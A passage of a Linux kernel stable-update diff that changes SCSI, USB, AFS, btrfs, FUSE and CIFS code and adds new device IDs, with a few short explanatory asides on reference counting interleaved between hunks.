+ 	aac_cancel_rescan_worker(aac);
+-	aac->use_map_queue = false;
+ 	scsi_remove_host(shost);
+ 
+ 	__aac_shutdown(aac);
+diff --git a/drivers/scsi/aacraid/src.c b/drivers/scsi/aacraid/src.c
+index 61949f3741886..11ef58204e96f 100644
+--- a/drivers/scsi/aacraid/src.c
++++ b/drivers/scsi/aacraid/src.c
+@@ -493,10 +493,6 @@ static int aac_src_deliver_message(struct fib *fib)
+ #endif
+ 
+ 	u16 vector_no;
+-	struct scsi_cmnd *scmd;
+-	u32 blk_tag;
+-	struct Scsi_Host *shost = dev->scsi_host_ptr;
+-	struct blk_mq_queue_map *qmap;
+ 
+ 	atomic_inc(&q->numpending);
+ 
+@@ -509,25 +505,8 @@ static int aac_src_deliver_message(struct fib *fib)
+ 		if ((dev->comm_interface == AAC_COMM_MESSAGE_TYPE3)
+ 			&& dev->sa_firmware)
+ 			vector_no = aac_get_vector(dev);
+-		else {
+-			if (!fib->vector_no || !fib->callback_data) {
+-				if (shost && dev->use_map_queue) {
+-					qmap = &shost->tag_set.map[HCTX_TYPE_DEFAULT];
+-					vector_no = qmap->mq_map[raw_smp_processor_id()];
+-				}
+-				/*
+-				 *	We hardcode the vector_no for
+-				 *	reserved commands as a valid shost is
+-				 *	absent during the init
+-				 */
+-				else
+-					vector_no = 0;
+-			} else {
+-				scmd = (struct scsi_cmnd *)fib->callback_data;
+-				blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
+-				vector_no = blk_mq_unique_tag_to_hwq(blk_tag);
+-			}
+-		}
++		else
++			vector_no = fib->vector_no;
+ 
+ 		if (native_hba) {
+ 			if (fib->flags & FIB_CONTEXT_FLAG_NATIVE_HBA_TMF) {
+diff --git a/drivers/scsi/bnx2fc/bnx2fc_fcoe.c b/drivers/scsi/bnx2fc/bnx2fc_fcoe.c
+index 05ddbb9bb7d8a..451a58e0fd969 100644
+--- a/drivers/scsi/bnx2fc/bnx2fc_fcoe.c
++++ b/drivers/scsi/bnx2fc/bnx2fc_fcoe.c
+@@ -429,7 +429,6 @@ static int bnx2fc_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	struct fcoe_ctlr *ctlr;
+ 	struct fcoe_rcv_info *fr;
+ 	struct fcoe_percpu_s *bg;
+-	struct sk_buff *tmp_skb;
+ 
+ 	interface = container_of(ptype, struct bnx2fc_interface,
+ 				 fcoe_packet_type);
+@@ -441,11 +440,9 @@ static int bnx2fc_rcv(struct sk_buff *skb, struct net_device *dev,
+ 		goto err;
+ 	}
+ 
+-	tmp_skb = skb_share_check(skb, GFP_ATOMIC);
+-	if (!tmp_skb)
+-		goto err;
+-
+-	skb = tmp_skb;
++	skb = skb_share_check(skb, GFP_ATOMIC);
++	if (!skb)
++		return -1;
+ 
+ 	if (unlikely(eth_hdr(skb)->h_proto != htons(ETH_P_FCOE))) {
+ 		printk(KERN_ERR PFX "bnx2fc_rcv: Wrong FC type frame\n");
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 02520f9123066..9a289d6f2e5ee 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -1108,6 +1108,7 @@ retry:
+ 
+ 	scsi_log_send(scmd);
+ 	scmd->submitter = SUBMITTED_BY_SCSI_ERROR_HANDLER;
++	scmd->flags |= SCMD_LAST;
+ 
+ 	/*
+ 	 * Lock sdev->state_mutex to avoid that scsi_device_quiesce() can
+@@ -2402,6 +2403,7 @@ scsi_ioctl_reset(struct scsi_device *dev, int __user *arg)
+ 	scsi_init_command(dev, scmd);
+ 
+ 	scmd->submitter = SUBMITTED_BY_SCSI_RESET_IOCTL;
++	scmd->flags |= SCMD_LAST;
+ 	memset(&scmd->sdb, 0, sizeof(scmd->sdb));
+ 
+ 	scmd->cmd_len			= 0;
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index d89f92032c1c2..f691bce5c1477 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -943,7 +943,7 @@ static void margining_port_remove(struct tb_port *port)
+ 	snprintf(dir_name, sizeof(dir_name), "port%d", port->port);
+ 	parent = debugfs_lookup(dir_name, port->sw->debugfs_dir);
+ 	if (parent)
+-		debugfs_remove_recursive(debugfs_lookup("margining", parent));
++		debugfs_lookup_and_remove("margining", parent);
+ 
+ 	kfree(port->usb4->margining);
+ 	port->usb4->margining = NULL;
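debugfs_lookup() hands back a dentry with an extra reference that the old debugfs_remove_recursive(debugfs_lookup(...)) chain never dropped, leaking one reference per removal; debugfs_lookup_and_remove() pairs the lookup with the drop. A toy refcount model of the difference (illustrative, not the debugfs API):

    #include <stdio.h>

    struct node { int refs; };

    static struct node *lookup(struct node *n) { n->refs++; return n; }
    static void put(struct node *n)            { n->refs--; }
    static void remove_tree(struct node *n)    { (void)n; /* detach only */ }

    static void lookup_and_remove(struct node *n)
    {
        struct node *d = lookup(n);

        remove_tree(d);
        put(d);         /* the drop the old call chain was missing */
    }

    int main(void)
    {
        struct node n = { .refs = 1 };

        lookup_and_remove(&n);
        printf("refs = %d (still 1: no leak)\n", n.refs);
        return 0;
    }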
+diff --git a/drivers/usb/serial/ftdi_sio.c b/drivers/usb/serial/ftdi_sio.c
+index 05e28a5ce42b1..fe2173e37b061 100644
+--- a/drivers/usb/serial/ftdi_sio.c
++++ b/drivers/usb/serial/ftdi_sio.c
+@@ -1033,9 +1033,9 @@ static const struct usb_device_id id_table_combined[] = {
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_USG_PID) },
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_NGT_PID) },
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_NGW_PID) },
+-	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AC_PID) },
+-	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AD_PID) },
+-	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AE_PID) },
++	{ USB_DEVICE(FTDI_VID, ACTISENSE_UID_PID) },
++	{ USB_DEVICE(FTDI_VID, ACTISENSE_USA_PID) },
++	{ USB_DEVICE(FTDI_VID, ACTISENSE_NGX_PID) },
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AF_PID) },
+ 	{ USB_DEVICE(FTDI_VID, CHETCO_SEAGAUGE_PID) },
+ 	{ USB_DEVICE(FTDI_VID, CHETCO_SEASWITCH_PID) },
+diff --git a/drivers/usb/serial/ftdi_sio_ids.h b/drivers/usb/serial/ftdi_sio_ids.h
+index e2099445db708..21a2b5a25fc09 100644
+--- a/drivers/usb/serial/ftdi_sio_ids.h
++++ b/drivers/usb/serial/ftdi_sio_ids.h
+@@ -1568,9 +1568,9 @@
+ #define ACTISENSE_USG_PID		0xD9A9 /* USG USB Serial Adapter */
+ #define ACTISENSE_NGT_PID		0xD9AA /* NGT NMEA2000 Interface */
+ #define ACTISENSE_NGW_PID		0xD9AB /* NGW NMEA2000 Gateway */
+-#define ACTISENSE_D9AC_PID		0xD9AC /* Actisense Reserved */
+-#define ACTISENSE_D9AD_PID		0xD9AD /* Actisense Reserved */
+-#define ACTISENSE_D9AE_PID		0xD9AE /* Actisense Reserved */
++#define ACTISENSE_UID_PID		0xD9AC /* USB Isolating Device */
++#define ACTISENSE_USA_PID		0xD9AD /* USB to Serial Adapter */
++#define ACTISENSE_NGX_PID		0xD9AE /* NGX NMEA2000 Gateway */
+ #define ACTISENSE_D9AF_PID		0xD9AF /* Actisense Reserved */
+ #define CHETCO_SEAGAUGE_PID		0xA548 /* SeaGauge USB Adapter */
+ #define CHETCO_SEASWITCH_PID		0xA549 /* SeaSwitch USB Adapter */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 7f2aa72d52e65..4adef92598709 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -272,6 +272,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_RM500Q			0x0800
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+ #define QUECTEL_PRODUCT_EC200U			0x0901
++#define QUECTEL_PRODUCT_EG912Y			0x6001
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
+ #define QUECTEL_PRODUCT_EC200A			0x6005
+ #define QUECTEL_PRODUCT_EM061K_LWW		0x6008
+@@ -1232,6 +1233,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, 0x0700, 0xff), /* BG95 */
+ 	  .driver_info = RSVD(3) | ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0xff, 0x10),
+ 	  .driver_info = ZLP },
+@@ -1244,6 +1246,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EG912Y, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500K, 0xff, 0x00, 0x00) },
+ 
+ 	{ USB_DEVICE(CMOTECH_VENDOR_ID, CMOTECH_PRODUCT_6001) },
+@@ -2242,6 +2245,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(0) | RSVD(1) | RSVD(6) },
+ 	{ USB_DEVICE(0x0489, 0xe0b5),						/* Foxconn T77W968 ESIM */
+ 	  .driver_info = RSVD(0) | RSVD(1) | RSVD(6) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0da, 0xff),                     /* Foxconn T99W265 MBIM variant */
++	  .driver_info = RSVD(3) | RSVD(5) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0db, 0xff),			/* Foxconn T99W265 MBIM */
+ 	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0ee, 0xff),			/* Foxconn T99W368 MBIM */
+diff --git a/drivers/usb/storage/unusual_devs.h b/drivers/usb/storage/unusual_devs.h
+index 20dcbccb290b3..fd68204374f2c 100644
+--- a/drivers/usb/storage/unusual_devs.h
++++ b/drivers/usb/storage/unusual_devs.h
+@@ -1305,6 +1305,17 @@ UNUSUAL_DEV(  0x090c, 0x6000, 0x0100, 0x0100,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_INITIAL_READ10 ),
+ 
++/*
++ * Patch by Tasos Sahanidis <tasos@tasossah.com>
++ * This flash drive always shows up with write protect enabled
++ * during the first mode sense.
++ */
++UNUSUAL_DEV(0x0951, 0x1697, 0x0100, 0x0100,
++		"Kingston",
++		"DT Ultimate G3",
++		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
++		US_FL_NO_WP_DETECT),
++
+ /*
+  * This Pentax still camera is not conformant
+  * to the USB storage specification: -
+diff --git a/fs/afs/cell.c b/fs/afs/cell.c
+index 988c2ac7cecec..926cb1188eba6 100644
+--- a/fs/afs/cell.c
++++ b/fs/afs/cell.c
+@@ -409,10 +409,12 @@ static int afs_update_cell(struct afs_cell *cell)
+ 		if (ret == -ENOMEM)
+ 			goto out_wake;
+ 
+-		ret = -ENOMEM;
+ 		vllist = afs_alloc_vlserver_list(0);
+-		if (!vllist)
++		if (!vllist) {
++			if (ret >= 0)
++				ret = -ENOMEM;
+ 			goto out_wake;
++		}
+ 
+ 		switch (ret) {
+ 		case -ENODATA:
+diff --git a/fs/afs/dynroot.c b/fs/afs/dynroot.c
+index 91e804c70dd0a..9937993cf29dc 100644
+--- a/fs/afs/dynroot.c
++++ b/fs/afs/dynroot.c
+@@ -114,6 +114,7 @@ static int afs_probe_cell_name(struct dentry *dentry)
+ 	struct afs_net *net = afs_d2net(dentry);
+ 	const char *name = dentry->d_name.name;
+ 	size_t len = dentry->d_name.len;
++	char *result = NULL;
+ 	int ret;
+ 
+ 	/* Names prefixed with a dot are R/W mounts. */
+@@ -131,9 +132,22 @@ static int afs_probe_cell_name(struct dentry *dentry)
+ 	}
+ 
+ 	ret = dns_query(net->net, "afsdb", name, len, "srv=1",
+-			NULL, NULL, false);
+-	if (ret == -ENODATA || ret == -ENOKEY)
++			&result, NULL, false);
++	if (ret == -ENODATA || ret == -ENOKEY || ret == 0)
+ 		ret = -ENOENT;
++	if (ret > 0 && ret >= sizeof(struct dns_server_list_v1_header)) {
++		struct dns_server_list_v1_header *v1 = (void *)result;
++
++		if (v1->hdr.zero == 0 &&
++		    v1->hdr.content == DNS_PAYLOAD_IS_SERVER_LIST &&
++		    v1->hdr.version == 1 &&
++		    (v1->status != DNS_LOOKUP_GOOD &&
++		     v1->status != DNS_LOOKUP_GOOD_WITH_BAD))
++			return -ENOENT;
++
++	}
++
++	kfree(result);
+ 	return ret;
+ }
+ 
+@@ -252,20 +266,9 @@ static int afs_dynroot_d_revalidate(struct dentry *dentry, unsigned int flags)
+ 	return 1;
+ }
+ 
+-/*
+- * Allow the VFS to enquire as to whether a dentry should be unhashed (mustn't
+- * sleep)
+- * - called from dput() when d_count is going to 0.
+- * - return 1 to request dentry be unhashed, 0 otherwise
+- */
+-static int afs_dynroot_d_delete(const struct dentry *dentry)
+-{
+-	return d_really_is_positive(dentry);
+-}
+-
+ const struct dentry_operations afs_dynroot_dentry_operations = {
+ 	.d_revalidate	= afs_dynroot_d_revalidate,
+-	.d_delete	= afs_dynroot_d_delete,
++	.d_delete	= always_delete_dentry,
+ 	.d_release	= afs_d_release,
+ 	.d_automount	= afs_d_automount,
+ };
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index c2d70fc1698c0..fcbb598d8c85d 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -585,6 +585,7 @@ struct afs_volume {
+ #define AFS_VOLUME_OFFLINE	4	/* - T if volume offline notice given */
+ #define AFS_VOLUME_BUSY		5	/* - T if volume busy notice given */
+ #define AFS_VOLUME_MAYBE_NO_IBULK 6	/* - T if some servers don't have InlineBulkStatus */
++#define AFS_VOLUME_RM_TREE	7	/* - Set if volume removed from cell->volumes */
+ #ifdef CONFIG_AFS_FSCACHE
+ 	struct fscache_volume	*cache;		/* Caching cookie */
+ #endif
+@@ -1517,6 +1518,7 @@ extern struct afs_vlserver_list *afs_extract_vlserver_list(struct afs_cell *,
+ extern struct afs_volume *afs_create_volume(struct afs_fs_context *);
+ extern int afs_activate_volume(struct afs_volume *);
+ extern void afs_deactivate_volume(struct afs_volume *);
++bool afs_try_get_volume(struct afs_volume *volume, enum afs_volume_trace reason);
+ extern struct afs_volume *afs_get_volume(struct afs_volume *, enum afs_volume_trace);
+ extern void afs_put_volume(struct afs_net *, struct afs_volume *, enum afs_volume_trace);
+ extern int afs_check_volume_status(struct afs_volume *, struct afs_operation *);
+diff --git a/fs/afs/volume.c b/fs/afs/volume.c
+index f4937029dcd72..1c9144e3e83ac 100644
+--- a/fs/afs/volume.c
++++ b/fs/afs/volume.c
+@@ -32,8 +32,13 @@ static struct afs_volume *afs_insert_volume_into_cell(struct afs_cell *cell,
+ 		} else if (p->vid > volume->vid) {
+ 			pp = &(*pp)->rb_right;
+ 		} else {
+-			volume = afs_get_volume(p, afs_volume_trace_get_cell_insert);
+-			goto found;
++			if (afs_try_get_volume(p, afs_volume_trace_get_cell_insert)) {
++				volume = p;
++				goto found;
++			}
++
++			set_bit(AFS_VOLUME_RM_TREE, &volume->flags);
++			rb_replace_node_rcu(&p->cell_node, &volume->cell_node, &cell->volumes);
+ 		}
+ 	}
+ 
+@@ -56,7 +61,8 @@ static void afs_remove_volume_from_cell(struct afs_volume *volume)
+ 				 afs_volume_trace_remove);
+ 		write_seqlock(&cell->volume_lock);
+ 		hlist_del_rcu(&volume->proc_link);
+-		rb_erase(&volume->cell_node, &cell->volumes);
++		if (!test_and_set_bit(AFS_VOLUME_RM_TREE, &volume->flags))
++			rb_erase(&volume->cell_node, &cell->volumes);
+ 		write_sequnlock(&cell->volume_lock);
+ 	}
+ }
+@@ -235,6 +241,20 @@ static void afs_destroy_volume(struct afs_net *net, struct afs_volume *volume)
+ 	_leave(" [destroyed]");
+ }
+ 
++/*
++ * Try to get a reference on a volume record.
++ */
++bool afs_try_get_volume(struct afs_volume *volume, enum afs_volume_trace reason)
++{
++	int r;
++
++	if (__refcount_inc_not_zero(&volume->ref, &r)) {
++		trace_afs_volume(volume->vid, r + 1, reason);
++		return true;
++	}
++	return false;
++}
++
+ /*
+  * Get a reference on a volume record.
+  */
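afs_try_get_volume() is the usual "get unless already zero" idiom: the RB-tree lookup can race with the final put, so it must refuse to resurrect a volume whose refcount has already reached zero, and the insert path instead replaces the dying node after flagging it AFS_VOLUME_RM_TREE so the teardown skips the rb_erase. A userspace sketch of inc-not-zero using C11 atomics:

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    static bool try_get(atomic_int *ref)
    {
        int r = atomic_load(ref);

        /* Increment only while the count is still nonzero. */
        while (r != 0)
            if (atomic_compare_exchange_weak(ref, &r, r + 1))
                return true;
        return false;   /* object already on its way to destruction */
    }

    int main(void)
    {
        atomic_int live = 1, dying = 0;

        printf("live:  %s\n", try_get(&live) ? "got ref" : "refused");
        printf("dying: %s\n", try_get(&dying) ? "got ref" : "refused");
        return 0;
    }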
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 4cd8e44cba4c5..b27795e13ff31 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2685,13 +2685,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+ 	spin_lock(&ctl->tree_lock);
+-	/* Count initial region as zone_unusable until it gets activated. */
+ 	if (!used)
+ 		to_free = size;
+-	else if (initial &&
+-		 test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &block_group->fs_info->flags) &&
+-		 (block_group->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM)))
+-		to_free = 0;
+ 	else if (initial)
+ 		to_free = block_group->zone_capacity;
+ 	else if (offset >= block_group->alloc_offset)
+@@ -2719,8 +2714,7 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	reclaimable_unusable = block_group->zone_unusable -
+ 			       (block_group->length - block_group->zone_capacity);
+ 	/* All the region is now unusable. Mark it as unused and reclaim */
+-	if (block_group->zone_unusable == block_group->length &&
+-	    block_group->alloc_offset) {
++	if (block_group->zone_unusable == block_group->length) {
+ 		btrfs_mark_bg_unused(block_group);
+ 	} else if (bg_reclaim_threshold &&
+ 		   reclaimable_unusable >=
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 675dbed075d8e..99cb690da9893 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -1574,19 +1574,9 @@ void btrfs_calc_zone_unusable(struct btrfs_block_group *cache)
+ 		return;
+ 
+ 	WARN_ON(cache->bytes_super != 0);
+-
+-	/* Check for block groups never get activated */
+-	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &cache->fs_info->flags) &&
+-	    cache->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM) &&
+-	    !test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags) &&
+-	    cache->alloc_offset == 0) {
+-		unusable = cache->length;
+-		free = 0;
+-	} else {
+-		unusable = (cache->alloc_offset - cache->used) +
+-			   (cache->length - cache->zone_capacity);
+-		free = cache->zone_capacity - cache->alloc_offset;
+-	}
++	unusable = (cache->alloc_offset - cache->used) +
++		   (cache->length - cache->zone_capacity);
++	free = cache->zone_capacity - cache->alloc_offset;
+ 
+ 	/* We only need ->free_space in ALLOC_SEQ block groups */
+ 	cache->cached = BTRFS_CACHE_FINISHED;
+@@ -1882,7 +1872,6 @@ struct btrfs_device *btrfs_zoned_get_device(struct btrfs_fs_info *fs_info,
+ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ {
+ 	struct btrfs_fs_info *fs_info = block_group->fs_info;
+-	struct btrfs_space_info *space_info = block_group->space_info;
+ 	struct map_lookup *map;
+ 	struct btrfs_device *device;
+ 	u64 physical;
+@@ -1894,7 +1883,6 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	map = block_group->physical_map;
+ 
+-	spin_lock(&space_info->lock);
+ 	spin_lock(&block_group->lock);
+ 	if (test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags)) {
+ 		ret = true;
+@@ -1923,14 +1911,7 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	/* Successfully activated all the zones */
+ 	set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags);
+-	WARN_ON(block_group->alloc_offset != 0);
+-	if (block_group->zone_unusable == block_group->length) {
+-		block_group->zone_unusable = block_group->length - block_group->zone_capacity;
+-		space_info->bytes_zone_unusable -= block_group->zone_capacity;
+-	}
+ 	spin_unlock(&block_group->lock);
+-	btrfs_try_granting_tickets(fs_info, space_info);
+-	spin_unlock(&space_info->lock);
+ 
+ 	/* For the active block group list */
+ 	btrfs_get_block_group(block_group);
+@@ -1943,7 +1924,6 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ out_unlock:
+ 	spin_unlock(&block_group->lock);
+-	spin_unlock(&space_info->lock);
+ 	return ret;
+ }
+ 
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index 98a9cf5318731..a9681fecbd91f 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -63,6 +63,19 @@ struct fuse_forget_link {
+ 	struct fuse_forget_link *next;
+ };
+ 
++/* Submount lookup tracking */
++struct fuse_submount_lookup {
++	/** Refcount */
++	refcount_t count;
++
++	/** Unique ID, which identifies the inode between userspace
++	 * and kernel */
++	u64 nodeid;
++
++	/** The request used for sending the FORGET message */
++	struct fuse_forget_link *forget;
++};
++
+ /** FUSE inode */
+ struct fuse_inode {
+ 	/** Inode data */
+@@ -155,6 +168,8 @@ struct fuse_inode {
+ 	 */
+ 	struct fuse_inode_dax *dax;
+ #endif
++	/** Submount specific lookup tracking */
++	struct fuse_submount_lookup *submount_lookup;
+ };
+ 
+ /** FUSE inode state bits */
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index bc3c3e76c646d..f81000d968875 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -68,6 +68,24 @@ struct fuse_forget_link *fuse_alloc_forget(void)
+ 	return kzalloc(sizeof(struct fuse_forget_link), GFP_KERNEL_ACCOUNT);
+ }
+ 
++static struct fuse_submount_lookup *fuse_alloc_submount_lookup(void)
++{
++	struct fuse_submount_lookup *sl;
++
++	sl = kzalloc(sizeof(struct fuse_submount_lookup), GFP_KERNEL_ACCOUNT);
++	if (!sl)
++		return NULL;
++	sl->forget = fuse_alloc_forget();
++	if (!sl->forget)
++		goto out_free;
++
++	return sl;
++
++out_free:
++	kfree(sl);
++	return NULL;
++}
++
+ static struct inode *fuse_alloc_inode(struct super_block *sb)
+ {
+ 	struct fuse_inode *fi;
+@@ -83,6 +101,7 @@ static struct inode *fuse_alloc_inode(struct super_block *sb)
+ 	fi->attr_version = 0;
+ 	fi->orig_ino = 0;
+ 	fi->state = 0;
++	fi->submount_lookup = NULL;
+ 	mutex_init(&fi->mutex);
+ 	spin_lock_init(&fi->lock);
+ 	fi->forget = fuse_alloc_forget();
+@@ -113,6 +132,17 @@ static void fuse_free_inode(struct inode *inode)
+ 	kmem_cache_free(fuse_inode_cachep, fi);
+ }
+ 
++static void fuse_cleanup_submount_lookup(struct fuse_conn *fc,
++					 struct fuse_submount_lookup *sl)
++{
++	if (!refcount_dec_and_test(&sl->count))
++		return;
++
++	fuse_queue_forget(fc, sl->forget, sl->nodeid, 1);
++	sl->forget = NULL;
++	kfree(sl);
++}
++
+ static void fuse_evict_inode(struct inode *inode)
+ {
+ 	struct fuse_inode *fi = get_fuse_inode(inode);
+@@ -132,6 +162,11 @@ static void fuse_evict_inode(struct inode *inode)
+ 					  fi->nlookup);
+ 			fi->forget = NULL;
+ 		}
++
++		if (fi->submount_lookup) {
++			fuse_cleanup_submount_lookup(fc, fi->submount_lookup);
++			fi->submount_lookup = NULL;
++		}
+ 	}
+ 	if (S_ISREG(inode->i_mode) && !fuse_is_bad(inode)) {
+ 		WARN_ON(!list_empty(&fi->write_files));
+@@ -311,6 +346,13 @@ void fuse_change_attributes(struct inode *inode, struct fuse_attr *attr,
+ 		fuse_dax_dontcache(inode, attr->flags);
+ }
+ 
++static void fuse_init_submount_lookup(struct fuse_submount_lookup *sl,
++				      u64 nodeid)
++{
++	sl->nodeid = nodeid;
++	refcount_set(&sl->count, 1);
++}
++
+ static void fuse_init_inode(struct inode *inode, struct fuse_attr *attr)
+ {
+ 	inode->i_mode = attr->mode & S_IFMT;
+@@ -368,12 +410,22 @@ struct inode *fuse_iget(struct super_block *sb, u64 nodeid,
+ 	 */
+ 	if (fc->auto_submounts && (attr->flags & FUSE_ATTR_SUBMOUNT) &&
+ 	    S_ISDIR(attr->mode)) {
++		struct fuse_inode *fi;
++
+ 		inode = new_inode(sb);
+ 		if (!inode)
+ 			return NULL;
+ 
+ 		fuse_init_inode(inode, attr);
+-		get_fuse_inode(inode)->nodeid = nodeid;
++		fi = get_fuse_inode(inode);
++		fi->nodeid = nodeid;
++		fi->submount_lookup = fuse_alloc_submount_lookup();
++		if (!fi->submount_lookup) {
++			iput(inode);
++			return NULL;
++		}
++		/* Sets nlookup = 1 on fi->submount_lookup->nlookup */
++		fuse_init_submount_lookup(fi->submount_lookup, nodeid);
+ 		inode->i_flags |= S_AUTOMOUNT;
+ 		goto done;
+ 	}
+@@ -396,11 +448,11 @@ retry:
+ 		iput(inode);
+ 		goto retry;
+ 	}
+-done:
+ 	fi = get_fuse_inode(inode);
+ 	spin_lock(&fi->lock);
+ 	fi->nlookup++;
+ 	spin_unlock(&fi->lock);
++done:
+ 	fuse_change_attributes(inode, attr, attr_valid, attr_version);
+ 
+ 	return inode;
+@@ -1439,6 +1491,8 @@ static int fuse_fill_super_submount(struct super_block *sb,
+ 	struct super_block *parent_sb = parent_fi->inode.i_sb;
+ 	struct fuse_attr root_attr;
+ 	struct inode *root;
++	struct fuse_submount_lookup *sl;
++	struct fuse_inode *fi;
+ 
+ 	fuse_sb_defaults(sb);
+ 	fm->sb = sb;
+@@ -1461,12 +1515,27 @@ static int fuse_fill_super_submount(struct super_block *sb,
+ 	 * its nlookup should not be incremented.  fuse_iget() does
+ 	 * that, though, so undo it here.
+ 	 */
+-	get_fuse_inode(root)->nlookup--;
++	fi = get_fuse_inode(root);
++	fi->nlookup--;
++
+ 	sb->s_d_op = &fuse_dentry_operations;
+ 	sb->s_root = d_make_root(root);
+ 	if (!sb->s_root)
+ 		return -ENOMEM;
+ 
++	/*
++	 * Grab the parent's submount_lookup pointer and take a
++	 * reference on the shared nlookup from the parent.  This is to
++	 * prevent the last forget for this nodeid from getting
++	 * triggered until all users have finished with it.
++	 */
++	sl = parent_fi->submount_lookup;
++	WARN_ON(!sl);
++	if (sl) {
++		refcount_inc(&sl->count);
++		fi->submount_lookup = sl;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index 0acb455368f23..5df8d93233376 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -38,11 +38,13 @@ void cifs_dump_detail(void *buf, struct TCP_Server_Info *server)
+ #ifdef CONFIG_CIFS_DEBUG2
+ 	struct smb_hdr *smb = buf;
+ 
+-	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d\n",
+-		 smb->Command, smb->Status.CifsError,
+-		 smb->Flags, smb->Flags2, smb->Mid, smb->Pid);
+-	cifs_dbg(VFS, "smb buf %p len %u\n", smb,
+-		 server->ops->calc_smb_size(smb));
++	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d Wct: %d\n",
++		 smb->Command, smb->Status.CifsError, smb->Flags,
++		 smb->Flags2, smb->Mid, smb->Pid, smb->WordCount);
++	if (!server->ops->check_message(buf, server->total_read, server)) {
++		cifs_dbg(VFS, "smb buf %p len %u\n", smb,
